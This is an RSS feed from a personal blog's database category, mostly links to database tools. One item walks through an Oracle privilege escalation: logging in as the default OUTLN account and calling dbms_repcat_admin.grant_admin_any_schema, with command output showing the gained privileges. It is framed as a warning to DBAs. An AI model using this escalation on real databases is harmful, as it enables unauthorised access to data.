<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet href="http://alien.twoday.net/rss2html.xsl" type="text/xsl"?>
<rdf:RDF 
  xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" 
  xmlns:dc="http://purl.org/dc/elements/1.1/"
  xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
  xmlns:cc="http://web.resource.org/cc/"
  xmlns="http://purl.org/rss/1.0/"
> 

  <channel rdf:about="http://alien.twoday.net/">
    <title>aliens blog (Was es alles gibt, was ich nicht brauche! (Aristoteles 384-322 v. Chr.)) : Rubrik:database</title>
    <link>http://alien.twoday.net/</link>
    <description>Was es alles gibt, was ich nicht brauche! (Aristoteles 384-322 v. Chr.)</description>
    <dc:publisher>Alien</dc:publisher>
    <dc:creator>Alien</dc:creator>
    <dc:date>2008-10-23T20:02:15Z</dc:date>
    <dc:language>en</dc:language>
    <sy:updatePeriod>hourly</sy:updatePeriod>
    <sy:updateFrequency>1</sy:updateFrequency>
    <sy:updateBase>2000-01-01T00:00:00Z</sy:updateBase>
    
    <image rdf:resource="http://static.twoday.net/alien/images/icon.jpg" />
    <items>
      <rdf:Seq>
            <rdf:li rdf:resource="http://alien.twoday.net/stories/5257422/" />
            <rdf:li rdf:resource="http://alien.twoday.net/stories/4990830/" />
            <rdf:li rdf:resource="http://alien.twoday.net/stories/1182607/" />
            <rdf:li rdf:resource="http://alien.twoday.net/stories/1008949/" />
            <rdf:li rdf:resource="http://alien.twoday.net/stories/509774/" />
            <rdf:li rdf:resource="http://alien.twoday.net/stories/502059/" />
            <rdf:li rdf:resource="http://alien.twoday.net/stories/408302/" />
            <rdf:li rdf:resource="http://alien.twoday.net/stories/14119/" />
            <rdf:li rdf:resource="http://alien.twoday.net/stories/14101/" />

      </rdf:Seq>
    </items>
  </channel>

  <image rdf:about="http://static.twoday.net/alien/images/icon.jpg">
    <title>aliens blog</title>
    <url>http://static.twoday.net/alien/images/icon.jpg</url>
    <link>http://alien.twoday.net/</link>
  </image>

  <item rdf:about="http://alien.twoday.net/stories/5257422/">
    <title>DBSight</title>
    <link>http://alien.twoday.net/stories/5257422/</link>
    <description>DBSight is a highly customizable full-test search platform for any relational database.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.dbsight.net/&quot;&gt;dbsight.net&lt;/a&gt;</description>
    <dc:creator>Alien</dc:creator>
    <dc:subject>&lt;a href=&quot;http://alien.twoday.net/topics/database&quot;&gt;database&lt;/a&gt;</dc:subject>
    <dc:rights>Copyright &#169; 2008 Alien</dc:rights>
    <dc:date>2008-10-15T13:49:00Z</dc:date>
  </item>
  <item rdf:about="http://alien.twoday.net/stories/4990830/">
    <title>SQuirreL SQL</title>
    <link>http://alien.twoday.net/stories/4990830/</link>
    <description>SQuirreL SQL Client is a graphical Java program that will allow you to view the structure of a JDBC compliant database, browse the data in tables, issue SQL commands etc.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.squirrelsql.org/&quot;&gt;www.squirrelsql.org&lt;/a&gt;</description>
    <dc:creator>Alien</dc:creator>
    <dc:subject>&lt;a href=&quot;http://alien.twoday.net/topics/database&quot;&gt;database&lt;/a&gt;</dc:subject>
    <dc:rights>Copyright &#169; 2008 Alien</dc:rights>
    <dc:date>2008-06-13T10:09:00Z</dc:date>
  </item>
  <item rdf:about="http://alien.twoday.net/stories/1182607/">
    <title>Unabhängiger und freier Support für Oracle Datenbanken</title>
    <link>http://alien.twoday.net/stories/1182607/</link>
    <description>&lt;a href=&quot;http://www.oracle-doku.de/&quot;&gt;oracle-doku.de&lt;/a&gt;</description>
    <dc:creator>Alien</dc:creator>
    <dc:subject>&lt;a href=&quot;http://alien.twoday.net/topics/database&quot;&gt;database&lt;/a&gt;</dc:subject>
    <dc:rights>Copyright &#169; 2005 Alien</dc:rights>
    <dc:date>2005-11-23T10:30:21Z</dc:date>
  </item>
  <item rdf:about="http://alien.twoday.net/stories/1008949/">
    <title>How to break into an Oracle database and gain DBA privileges</title>
    <link>http://alien.twoday.net/stories/1008949/</link>
    <description>Starting from Oracle8i, new databases made with a create database command are installed with a user called OUTLN. This schema is used to hold information about stored outlines for the plan stability feature. The user has an easily guessable password and is left unlocked when the database is created. DBAs commonly overlook this but it is so important to either change the password or lock the account because it can be used to gain DBA privileges. Here&apos;s how:    &lt;br /&gt;
&lt;br /&gt;
$ sqlplus outln/xxxx@DEMO    &lt;br /&gt;
&lt;br /&gt;
SQL*Plus: Release 9.2.0.3.0 - Production on Thu Sep 4 13:58:14 2003    &lt;br /&gt;
&lt;br /&gt;
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.    &lt;br /&gt;
&lt;br /&gt;
Connected to:    &lt;br /&gt;
Oracle9i Enterprise Edition Release 9.2.0.3.0 - 64bit Production    &lt;br /&gt;
With the Partitioning, OLAP and Oracle Data Mining options    &lt;br /&gt;
JServer Release 9.2.0.3.0 - Production    &lt;br /&gt;
&lt;br /&gt;
SQL&gt; select * from session_privs;    &lt;br /&gt;
&lt;br /&gt;
PRIVILEGE    &lt;br /&gt;
----------------------------------------    &lt;br /&gt;
CREATE SESSION    &lt;br /&gt;
ALTER SESSION    &lt;br /&gt;
UNLIMITED TABLESPACE    &lt;br /&gt;
CREATE TABLE    &lt;br /&gt;
CREATE CLUSTER    &lt;br /&gt;
CREATE SYNONYM    &lt;br /&gt;
CREATE VIEW    &lt;br /&gt;
CREATE SEQUENCE    &lt;br /&gt;
CREATE DATABASE LINK    &lt;br /&gt;
CREATE PROCEDURE    &lt;br /&gt;
EXECUTE ANY PROCEDURE    &lt;br /&gt;
CREATE TRIGGER    &lt;br /&gt;
CREATE TYPE    &lt;br /&gt;
CREATE OPERATOR    &lt;br /&gt;
CREATE INDEXTYPE&lt;br /&gt;
&lt;br /&gt;
The critical system privilege granted by default to the OUTLN user is EXECUTE ANY PROCEDURE. If you can execute any procedure in the database, then try this one and look what privileges you can gain:    &lt;br /&gt;
&lt;br /&gt;
SQL&gt; exec dbms_repcat_admin.grant_admin_any_schema(&apos;OUTLN&apos;);    &lt;br /&gt;
&lt;br /&gt;
PL/SQL procedure successfully completed.    &lt;br /&gt;
&lt;br /&gt;
SQL&gt; select * from session_privs;    &lt;br /&gt;
&lt;br /&gt;
PRIVILEGE    &lt;br /&gt;
----------------------------------------    &lt;br /&gt;
CREATE SESSION    &lt;br /&gt;
ALTER SESSION    &lt;br /&gt;
UNLIMITED TABLESPACE    &lt;br /&gt;
CREATE TABLE    &lt;br /&gt;
CREATE ANY TABLE    &lt;br /&gt;
ALTER ANY TABLE    &lt;br /&gt;
DROP ANY TABLE    &lt;br /&gt;
COMMENT ANY TABLE    &lt;br /&gt;
SELECT ANY TABLE    &lt;br /&gt;
INSERT ANY TABLE    &lt;br /&gt;
UPDATE ANY TABLE    &lt;br /&gt;
DELETE ANY TABLE    &lt;br /&gt;
CREATE CLUSTER    &lt;br /&gt;
CREATE ANY CLUSTER    &lt;br /&gt;
ALTER ANY CLUSTER    &lt;br /&gt;
DROP ANY CLUSTER    &lt;br /&gt;
CREATE ANY INDEX    &lt;br /&gt;
ALTER ANY INDEX    &lt;br /&gt;
DROP ANY INDEX    &lt;br /&gt;
CREATE SYNONYM    &lt;br /&gt;
CREATE ANY SYNONYM    &lt;br /&gt;
DROP ANY SYNONYM    &lt;br /&gt;
CREATE PUBLIC SYNONYM    &lt;br /&gt;
DROP PUBLIC SYNONYM    &lt;br /&gt;
CREATE VIEW    &lt;br /&gt;
CREATE ANY VIEW    &lt;br /&gt;
DROP ANY VIEW    &lt;br /&gt;
CREATE SEQUENCE    &lt;br /&gt;
CREATE ANY SEQUENCE    &lt;br /&gt;
ALTER ANY SEQUENCE    &lt;br /&gt;
DROP ANY SEQUENCE    &lt;br /&gt;
CREATE DATABASE LINK    &lt;br /&gt;
CREATE PROCEDURE    &lt;br /&gt;
CREATE ANY PROCEDURE    &lt;br /&gt;
ALTER ANY PROCEDURE    &lt;br /&gt;
DROP ANY PROCEDURE    &lt;br /&gt;
EXECUTE ANY PROCEDURE    &lt;br /&gt;
CREATE TRIGGER    &lt;br /&gt;
CREATE ANY TRIGGER    &lt;br /&gt;
ALTER ANY TRIGGER    &lt;br /&gt;
DROP ANY TRIGGER    &lt;br /&gt;
CREATE ANY SNAPSHOT    &lt;br /&gt;
ALTER ANY SNAPSHOT    &lt;br /&gt;
DROP ANY SNAPSHOT    &lt;br /&gt;
CREATE TYPE    &lt;br /&gt;
CREATE ANY TYPE    &lt;br /&gt;
ALTER ANY TYPE    &lt;br /&gt;
DROP ANY TYPE    &lt;br /&gt;
CREATE OPERATOR    &lt;br /&gt;
CREATE ANY OPERATOR    &lt;br /&gt;
DROP ANY OPERATOR    &lt;br /&gt;
CREATE INDEXTYPE    &lt;br /&gt;
CREATE ANY INDEXTYPE    &lt;br /&gt;
DROP ANY INDEXTYPE    &lt;br /&gt;
&lt;br /&gt;
54 rows selected.&lt;br /&gt;
&lt;br /&gt;
[via &lt;a href=&quot;http://www.oracleadvice.com/Tips/outln.htm&quot;&gt;oracleadvice.com/..&lt;/a&gt;]</description>
    <dc:creator>Alien</dc:creator>
    <dc:subject>&lt;a href=&quot;http://alien.twoday.net/topics/database&quot;&gt;database&lt;/a&gt;</dc:subject>
    <dc:rights>Copyright &#169; 2005 Alien</dc:rights>
    <dc:date>2005-09-27T07:13:27Z</dc:date>
  </item>
  <item rdf:about="http://alien.twoday.net/stories/509774/">
    <title>SQLite</title>
    <link>http://alien.twoday.net/stories/509774/</link>
    <description>&lt;i&gt;SQLite is a small C library that implements a self-contained, embeddable, zero-configuration SQL database engine.&lt;/i&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.sqlite.org/&quot;&gt;sqlite.org&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Super für eine einfache und schnelle SQL Datenbank auf Commandline Ebene.</description>
    <dc:creator>Alien</dc:creator>
    <dc:subject>&lt;a href=&quot;http://alien.twoday.net/topics/database&quot;&gt;database&lt;/a&gt;</dc:subject>
    <dc:rights>Copyright &#169; 2005 Alien</dc:rights>
    <dc:date>2005-02-08T15:17:03Z</dc:date>
  </item>
  <item rdf:about="http://alien.twoday.net/stories/502059/">
    <title>Free Oracle Tools</title>
    <link>http://alien.twoday.net/stories/502059/</link>
    <description>&lt;a href=&quot;http://www.globecom.net/tora/&quot;&gt;TOra&lt;/a&gt; is a Toolkit for Oracle which aims to help the DBA or developer of database application. Features PL/SQL debugger, SQL worksheet with syntax highlighting, DB browser and a comprehensive set of DBA tools.&lt;br /&gt;
&lt;a href=&quot;http://www.globecom.net/tora/&quot;&gt;globecom.net/tora&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://sourceforge.net/projects/tora/&quot;&gt;sourceforge.net/projects/tora&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.aquafold.com/&quot;&gt;Aqua Data Studio 3.7&lt;/a&gt; is a database query and administration tool that allows developers to easily create, edit, and execute SQL scripts, as well as browse and visually modify database structures. Aqua Data Studio provides an integrated database environment with a single consistent interface to all major relational databases. This allows the database administrator or developer to tackle multiple tasks simultaneously from one application.&lt;br /&gt;
&lt;a href=&quot;http://www.aquafold.com/&quot;&gt;aquafold.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.oracletool.com&quot;&gt;Oracletool&lt;/a&gt; is an interactive, web based application that runs as a CGI script using your web server. The advantage of Oracletool over non web based tools is that nothing needs to be installed on the client side machine. All you need to use Oracletool, once installed, is a web browser. There is nothing that needs to be created or altered in your databases to use Oracletool either, other than a role for users who are not DBA&apos;s, but want to use the tool. No database changes whatsoever are needed for a DBA to use Oracletool.&lt;br /&gt;
&lt;a href=&quot;http://www.oracletool.com&quot;&gt;oracletool.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Quest Software presents &lt;a href=&quot;http://www.quest-pipelines.com/pipelines/dba/DataDictionary/data.htm&quot;&gt;Data Dictionary for Oracle v2.0&lt;/a&gt;, a freeware tool for viewing DBA_View and V$ View information. Use this application to reference Oracle 9.i2 documentation or connect to your own Oracle instance to obtain descriptions and column data from a live system.&lt;br /&gt;
&lt;a href=&quot;http://www.quest-pipelines.com/pipelines/dba/DataDictionary/data.htm&quot;&gt;quest-pipelines.com/..&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
more Oracle resources:&lt;br /&gt;
&lt;a href=&quot;http://www.pcvoyager.com/dir/database_oracle.html&quot;&gt;http://www.pcvoyager.com/dir/database_oracle.html&lt;/a&gt;</description>
    <dc:creator>Alien</dc:creator>
    <dc:subject>&lt;a href=&quot;http://alien.twoday.net/topics/database&quot;&gt;database&lt;/a&gt;</dc:subject>
    <dc:rights>Copyright &#169; 2005 Alien</dc:rights>
    <dc:date>2005-02-03T09:22:31Z</dc:date>
  </item>
  <item rdf:about="http://alien.twoday.net/stories/408302/">
    <title>Ruby und Oracle</title>
    <link>http://alien.twoday.net/stories/408302/</link>
    <description>&lt;a href=&quot;http://ruby9i.sourceforge.net/&quot;&gt;The Ruby9i Library&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.jiubao.org/ruby-oci8/&quot;&gt;Ruby/OCI8&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.ruby-lang.org/&quot;&gt;Ruby Home Page&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Onlinebuch: &lt;a href=&quot;http://www.approximity.com/rubybuch2/node4_main.html&quot;&gt;Programmieren mit Ruby&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://exerb.sourceforge.jp/index.en.html&quot;&gt;Exerb Project&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://freeride.rubyforge.org/wiki/wiki.pl&quot;&gt;Free Ruby IDE&lt;/a&gt;</description>
    <dc:creator>Alien</dc:creator>
    <dc:subject>&lt;a href=&quot;http://alien.twoday.net/topics/database&quot;&gt;database&lt;/a&gt;</dc:subject>
    <dc:rights>Copyright &#169; 2004 Alien</dc:rights>
    <dc:date>2004-11-20T05:29:26Z</dc:date>
  </item>
  <item rdf:about="http://alien.twoday.net/stories/14119/">
    <title>Sentences, Assoziative Datenbank</title>
    <link>http://alien.twoday.net/stories/14119/</link>
    <description>&lt;a target=&quot;_blank&quot; href=&quot;http://www.lazysoftware.com/technology_sentences.htm&quot;&gt;Sentences&lt;/a&gt; ist ein innovatives Datenbank-Management-System, welches durch die Firma &lt;a target=&quot;_blank&quot; href=&quot;http://www.lazysoftware.com/&quot;&gt;Lazy Software Ltd.&lt;/a&gt; in Java entwickelt wurde und die einzige kommerzielle Implementierung des &lt;a target=&quot;_blank&quot; href=&quot;http://www.lazysoftware.com/technology_associativemodel.htm&quot;&gt;assoziativen Datenmodells&lt;/a&gt; ist.&lt;br /&gt;
&lt;br /&gt;
Das assoziative Datenmodell ist die erste, definitiv neue Datenmodell-Architektur seit der &quot;Erfindung&quot; des Internet, welches den strukturellen Bedürfnissen von Internetanwendungen entspricht und das erlaubt, die Strukturen von Informationen einer realen Welt, so wie sie von uns Menschen wahrgenommen und verarbeitet werden, zu modellieren.&lt;br /&gt;
&lt;br /&gt;
Diese Architektur ist der erste grössere Schritt, welcher tatsächlich über den Ansatz der relationalen Datenbank-Theorie hinausgeht.</description>
    <dc:creator>Alien</dc:creator>
    <dc:subject>&lt;a href=&quot;http://alien.twoday.net/topics/database&quot;&gt;database&lt;/a&gt;</dc:subject>
    <dc:rights>Copyright &#169; 2003 Alien</dc:rights>
    <dc:date>2003-03-20T12:26:26Z</dc:date>
  </item>
  <item rdf:about="http://alien.twoday.net/stories/14101/">
    <title>Caché, the post-relational database</title>
    <link>http://alien.twoday.net/stories/14101/</link>
    <description>&lt;a target=&quot;_blank&quot; href=&quot;http://www.intersystems.de/cache/&quot;&gt;InterSystems Caché&lt;/a&gt;: Die leistungsstarke Verbindung von Objekten und SQL in einer multidimensionalen Datenbank Engine.&lt;br /&gt;
&lt;br /&gt;
&lt;a target=&quot;_blank&quot; href=&quot;http://www.intersystems.de/downloads/&quot;&gt;Gratis Download&lt;/a&gt; (Single User Version)</description>
    <dc:creator>Alien</dc:creator>
    <dc:subject>&lt;a href=&quot;http://alien.twoday.net/topics/database&quot;&gt;database&lt;/a&gt;</dc:subject>
    <dc:rights>Copyright &#169; 2003 Alien</dc:rights>
    <dc:date>2003-03-20T11:11:15Z</dc:date>
  </item>


<textinput rdf:about="http://alien.twoday.net/search">
   <title>find</title>
   <description>Search this site:</description>
   <name>q</name>
   <link>http://alien.twoday.net/search</link>
</textinput>


</rdf:RDF>
